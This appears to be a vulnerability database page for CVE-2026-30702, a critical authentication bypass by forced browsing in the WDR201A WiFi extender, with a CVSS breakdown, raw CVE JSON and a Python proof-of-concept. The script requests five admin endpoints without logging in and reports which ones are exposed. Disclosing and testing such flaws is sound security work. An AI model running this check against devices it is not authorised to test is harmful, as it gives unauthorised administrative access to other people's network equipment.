Security Vulnerability Report
CVE-2026-30702 CVSS 9.8 CRITICAL

CVE-2026-30702

Published: 2026-03-18 18:16:28
Last Modified: 2026-03-23 16:16:46

Description

The WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) implements a broken authentication mechanism in its web management interface. The login page does not properly enforce session validation, allowing attackers to bypass authentication by directly accessing restricted web application endpoints through forced browsing.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WiFi Extender WDR201A firmware < LFMZX28040922V1.02
WiFi Extender WDR201A hardware V2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-30702 PoC - Authentication Bypass on WDR201A
# Target: WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02)

target_ip = "192.168.0.1"  # Typical default IP
base_url = f"http://{target_ip}"

# Endpoints that should require authentication
protected_endpoints = [
    "/admin/status.asp",
    "/admin/network.asp",
    "/admin/wireless.asp",
    "/admin/system.asp",
    "/admin/firmware.asp"
]


def test_auth_bypass():
    """Test for authentication bypass vulnerability"""
    for endpoint in protected_endpoints:
        url = base_url + endpoint
        try:
            # Direct access without authentication
            response = requests.get(url, timeout=5)

            # Check if we can access protected resource
            if response.status_code == 200 and "login" not in response.text.lower():
                print(f"[+] VULNERABLE: {endpoint} - Authentication bypassed!")
                print(f" Status: {response.status_code}")
            elif response.status_code == 200:
                print(f"[-] Protected: {endpoint} - Requires authentication")
            else:
                print(f"[*] Endpoint: {endpoint} - Status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {endpoint}: {e}")


if __name__ == "__main__":
    print("CVE-2026-30702 - WDR201A Authentication Bypass Test")
    print("=" * 50)
    test_auth_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30702", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:27.860", "lastModified": "2026-03-23T16:16:45.750", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) implements a broken authentication mechanism in its web management interface. The login page does not properly enforce session validation, allowing attackers to bypass authentication by directly accessing restricted web application endpoints through forced browsing"}, {"lang": "es", "value": "El Extensor WiFi WDR201A (HW V2.1, FW LFMZX28040922V1.02) implementa un mecanismo de autenticación defectuoso en su interfaz de gestión web. La página de inicio de sesión no aplica correctamente la validación de sesión, permitiendo a los atacantes eludir la autenticación accediendo directamente a puntos finales restringidos de la aplicación web mediante navegación forzada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "[email protected]"}, {"url": 
"https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China", "source": "[email protected]"}, {"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}